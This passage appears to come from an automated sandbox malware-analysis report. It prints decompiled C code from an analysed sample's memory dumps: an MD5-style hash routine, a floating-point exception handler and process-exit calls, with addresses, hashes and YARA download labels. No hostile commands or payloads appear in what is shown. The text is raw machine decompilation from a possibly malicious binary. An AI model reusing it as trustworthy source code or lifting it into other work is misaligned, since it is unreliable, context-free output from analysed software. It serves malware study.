                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,736D8DCA,?,00000001,?,?), ref: 736D8DF4
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 736D8E06
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                • Opcode ID: 8b29fc0df85888af40a4131d13d0a6d3ceec61b955c34a27a0badf0754762fc0
                                                                                                                                                                                                                                • Instruction ID: 3459ab2d196b1646e32192a3d16448950a22a397adb77cc1ff3a04dffd9c6b2e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b29fc0df85888af40a4131d13d0a6d3ceec61b955c34a27a0badf0754762fc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3E08C72050288EFCF127FA6CA0CB4C3B79FB94A46B104454F80A8A1A8CF39D946EB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A83089, Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 49%
                                                                                                                                                                                                                                			E00A83089(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                                                                                                                                                                                                                0x00a8308c
                                                                                                                                                                                                                                0x00a83097
                                                                                                                                                                                                                                0x00a8309a
                                                                                                                                                                                                                                0x00a8309d
                                                                                                                                                                                                                                0x00a8309e
                                                                                                                                                                                                                                0x00a830bc
                                                                                                                                                                                                                                0x00a830be
                                                                                                                                                                                                                                0x00a830c1
                                                                                                                                                                                                                                0x00a830c4
                                                                                                                                                                                                                                0x00a830c4
                                                                                                                                                                                                                                0x00a830c7
                                                                                                                                                                                                                                0x00a830c7
                                                                                                                                                                                                                                0x00a830ca
                                                                                                                                                                                                                                0x00a830ca
                                                                                                                                                                                                                                0x00a830cd
                                                                                                                                                                                                                                0x00a830cd
                                                                                                                                                                                                                                0x00a830ea
                                                                                                                                                                                                                                0x00a830ed
                                                                                                                                                                                                                                0x00a83103
                                                                                                                                                                                                                                0x00a83106
                                                                                                                                                                                                                                0x00a83120
                                                                                                                                                                                                                                0x00a83123
                                                                                                                                                                                                                                0x00a83139
                                                                                                                                                                                                                                0x00a8313c
                                                                                                                                                                                                                                0x00a8313e
                                                                                                                                                                                                                                0x00a83156
                                                                                                                                                                                                                                0x00a83159
                                                                                                                                                                                                                                0x00a8315c
                                                                                                                                                                                                                                0x00a83174
                                                                                                                                                                                                                                0x00a83177
                                                                                                                                                                                                                                0x00a83191
                                                                                                                                                                                                                                0x00a83194
                                                                                                                                                                                                                                0x00a831aa
                                                                                                                                                                                                                                0x00a831ad
                                                                                                                                                                                                                                0x00a831af
                                                                                                                                                                                                                                0x00a831c7
                                                                                                                                                                                                                                0x00a831cc
                                                                                                                                                                                                                                0x00a831cf
                                                                                                                                                                                                                                0x00a831e5
                                                                                                                                                                                                                                0x00a831e8
                                                                                                                                                                                                                                0x00a83202
                                                                                                                                                                                                                                0x00a83205
                                                                                                                                                                                                                                0x00a8321b
                                                                                                                                                                                                                                0x00a8321e
                                                                                                                                                                                                                                0x00a83220
                                                                                                                                                                                                                                0x00a8323b
                                                                                                                                                                                                                                0x00a8323e
                                                                                                                                                                                                                                0x00a83255
                                                                                                                                                                                                                                0x00a83258
                                                                                                                                                                                                                                0x00a8325c
                                                                                                                                                                                                                                0x00a83275
                                                                                                                                                                                                                                0x00a83278
                                                                                                                                                                                                                                0x00a8327a
                                                                                                                                                                                                                                0x00a8327d
                                                                                                                                                                                                                                0x00a83298
                                                                                                                                                                                                                                0x00a8329b
                                                                                                                                                                                                                                0x00a832b4
                                                                                                                                                                                                                                0x00a832b7
                                                                                                                                                                                                                                0x00a832c7
                                                                                                                                                                                                                                0x00a832ca
                                                                                                                                                                                                                                0x00a832e2
                                                                                                                                                                                                                                0x00a832e5
                                                                                                                                                                                                                                0x00a832ff
                                                                                                                                                                                                                                0x00a83302
                                                                                                                                                                                                                                0x00a8331a
                                                                                                                                                                                                                                0x00a8331d
                                                                                                                                                                                                                                0x00a83333
                                                                                                                                                                                                                                0x00a83336
                                                                                                                                                                                                                                0x00a8334e
                                                                                                                                                                                                                                0x00a83351
                                                                                                                                                                                                                                0x00a83369
                                                                                                                                                                                                                                0x00a8336c
                                                                                                                                                                                                                                0x00a83386
                                                                                                                                                                                                                                0x00a83389
                                                                                                                                                                                                                                0x00a8339f
                                                                                                                                                                                                                                0x00a833a2
                                                                                                                                                                                                                                0x00a833ba
                                                                                                                                                                                                                                0x00a833bd
                                                                                                                                                                                                                                0x00a833d7
                                                                                                                                                                                                                                0x00a833da
                                                                                                                                                                                                                                0x00a833f2
                                                                                                                                                                                                                                0x00a833f5
                                                                                                                                                                                                                                0x00a8340b
                                                                                                                                                                                                                                0x00a8340e
                                                                                                                                                                                                                                0x00a83426
                                                                                                                                                                                                                                0x00a83429
                                                                                                                                                                                                                                0x00a83441
                                                                                                                                                                                                                                0x00a83444
                                                                                                                                                                                                                                0x00a83456
                                                                                                                                                                                                                                0x00a83459
                                                                                                                                                                                                                                0x00a8346b
                                                                                                                                                                                                                                0x00a8346e
                                                                                                                                                                                                                                0x00a83480
                                                                                                                                                                                                                                0x00a83483
                                                                                                                                                                                                                                0x00a83487
                                                                                                                                                                                                                                0x00a83497
                                                                                                                                                                                                                                0x00a8349a
                                                                                                                                                                                                                                0x00a834a8
                                                                                                                                                                                                                                0x00a834ab
                                                                                                                                                                                                                                0x00a834bd
                                                                                                                                                                                                                                0x00a834c0
                                                                                                                                                                                                                                0x00a834d4
                                                                                                                                                                                                                                0x00a834d7
                                                                                                                                                                                                                                0x00a834d9
                                                                                                                                                                                                                                0x00a834e9
                                                                                                                                                                                                                                0x00a834ec
                                                                                                                                                                                                                                0x00a834fe
                                                                                                                                                                                                                                0x00a83501
                                                                                                                                                                                                                                0x00a8350f
                                                                                                                                                                                                                                0x00a83512
                                                                                                                                                                                                                                0x00a83524
                                                                                                                                                                                                                                0x00a83527
                                                                                                                                                                                                                                0x00a8352b
                                                                                                                                                                                                                                0x00a8353b
                                                                                                                                                                                                                                0x00a8353e
                                                                                                                                                                                                                                0x00a83550
                                                                                                                                                                                                                                0x00a83553
                                                                                                                                                                                                                                0x00a83561
                                                                                                                                                                                                                                0x00a83564
                                                                                                                                                                                                                                0x00a83576
                                                                                                                                                                                                                                0x00a83579
                                                                                                                                                                                                                                0x00a8358b
                                                                                                                                                                                                                                0x00a8358e
                                                                                                                                                                                                                                0x00a835a2
                                                                                                                                                                                                                                0x00a835a5
                                                                                                                                                                                                                                0x00a835b9
                                                                                                                                                                                                                                0x00a835bc
                                                                                                                                                                                                                                0x00a835d0
                                                                                                                                                                                                                                0x00a835d3
                                                                                                                                                                                                                                0x00a835e7
                                                                                                                                                                                                                                0x00a835ea
                                                                                                                                                                                                                                0x00a835fe
                                                                                                                                                                                                                                0x00a83601
                                                                                                                                                                                                                                0x00a83615
                                                                                                                                                                                                                                0x00a8361a
                                                                                                                                                                                                                                0x00a8362c
                                                                                                                                                                                                                                0x00a8362f
                                                                                                                                                                                                                                0x00a83643
                                                                                                                                                                                                                                0x00a83646
                                                                                                                                                                                                                                0x00a8365a
                                                                                                                                                                                                                                0x00a8365d
                                                                                                                                                                                                                                0x00a83673
                                                                                                                                                                                                                                0x00a83676
                                                                                                                                                                                                                                0x00a8368a
                                                                                                                                                                                                                                0x00a8368d
                                                                                                                                                                                                                                0x00a8369f
                                                                                                                                                                                                                                0x00a836a2
                                                                                                                                                                                                                                0x00a836b6
                                                                                                                                                                                                                                0x00a836b9
                                                                                                                                                                                                                                0x00a836cd
                                                                                                                                                                                                                                0x00a836d0
                                                                                                                                                                                                                                0x00a836e4
                                                                                                                                                                                                                                0x00a836ed
                                                                                                                                                                                                                                0x00a836f0
                                                                                                                                                                                                                                0x00a836f9
                                                                                                                                                                                                                                0x00a83702
                                                                                                                                                                                                                                0x00a8370a
                                                                                                                                                                                                                                0x00a83712
                                                                                                                                                                                                                                0x00a8371c
                                                                                                                                                                                                                                0x00a83731

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                                • Opcode ID: 9e272f4f369135326a610e9d97de374ff2095c53d9b8e94d8a5de78a0905f596
                                                                                                                                                                                                                                • Instruction ID: 32e27fc6434b93b593e6703167855d84671ced95f80aa5c391953c29a7fb27c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e272f4f369135326a610e9d97de374ff2095c53d9b8e94d8a5de78a0905f596
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1222747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736E05D3, Relevance: 1.8, APIs: 1, Instructions: 274COMMONCrypto
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736E05D3(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E736DFFFA(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E736DFF60(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}
























                                                                                                                                                                                                                                0x736e05e1
                                                                                                                                                                                                                                0x736e05e8
                                                                                                                                                                                                                                0x736e05ed
                                                                                                                                                                                                                                0x736e05f3
                                                                                                                                                                                                                                0x736e05f6
                                                                                                                                                                                                                                0x736e05fc
                                                                                                                                                                                                                                0x736e0601
                                                                                                                                                                                                                                0x736e0606
                                                                                                                                                                                                                                0x736e0606
                                                                                                                                                                                                                                0x736e060c
                                                                                                                                                                                                                                0x736e0611
                                                                                                                                                                                                                                0x736e0616
                                                                                                                                                                                                                                0x736e0616
                                                                                                                                                                                                                                0x736e061d
                                                                                                                                                                                                                                0x736e0622
                                                                                                                                                                                                                                0x736e0627
                                                                                                                                                                                                                                0x736e0627
                                                                                                                                                                                                                                0x736e062e
                                                                                                                                                                                                                                0x736e0633
                                                                                                                                                                                                                                0x736e0638
